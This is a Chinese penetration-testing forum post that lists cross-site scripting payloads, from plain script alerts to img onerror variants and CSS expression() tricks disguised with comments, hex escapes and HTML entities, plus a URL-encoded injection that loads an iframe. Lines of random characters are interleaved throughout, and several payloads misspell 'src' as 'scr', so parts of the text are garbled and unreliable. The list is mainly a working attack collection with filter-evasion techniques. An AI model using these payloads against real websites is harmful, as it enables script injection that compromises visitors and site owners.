中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
* v7 G, `- t% e& ]5 R
<img scr=javascript:alert("跨站")></img>
+ X% w \$ i/ L* c6 K
<img scr="javascript: alert(/跨站/)></img>
6 V; m; N: p3 v) E( T8 p8 `
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
( v& [3 G; y3 _" [, G8 }1 y
<img scr="#" onerror=alert(/跨站/)></img>
0 t6 `2 @7 E: Q' i* M5 x ?
<img scr="#" style="xss:expression(alert(/xss/));"></img>
n; P( i" r1 r; [9 Y$ N. ~
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
1 T0 G2 a% m8 H. E; |# z" A
<img src=vbscript:msgbox ("xss")></img>
% N. `2 i0 X' U! w' H: |2 Q
<style> input {left:expression (alert('xss'))}</style>
; Z( K& ?- W' t" X3 e
<div style={left:expression (alert('xss'))}></div>
) A: Q; z5 r% [9 Z
<div style={left:exp/* */ression (alert('xss'))}></div>
- }9 @7 U2 }# [; @2 R
<div style={left:\0065\0078ression (alert('xss'))}></div>
- y6 _8 Y1 E/ c0 D5 b6 ?
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
& } }7 p- a1 W$ w. ~
unicode <div style="{left:expRessioN (alert('xss'))}">
0 f3 x' ]! [- ]* j3 v
' g$ }( |* O k" \+ ^7 C
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
8 O) V/ [) R; o' z) e
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2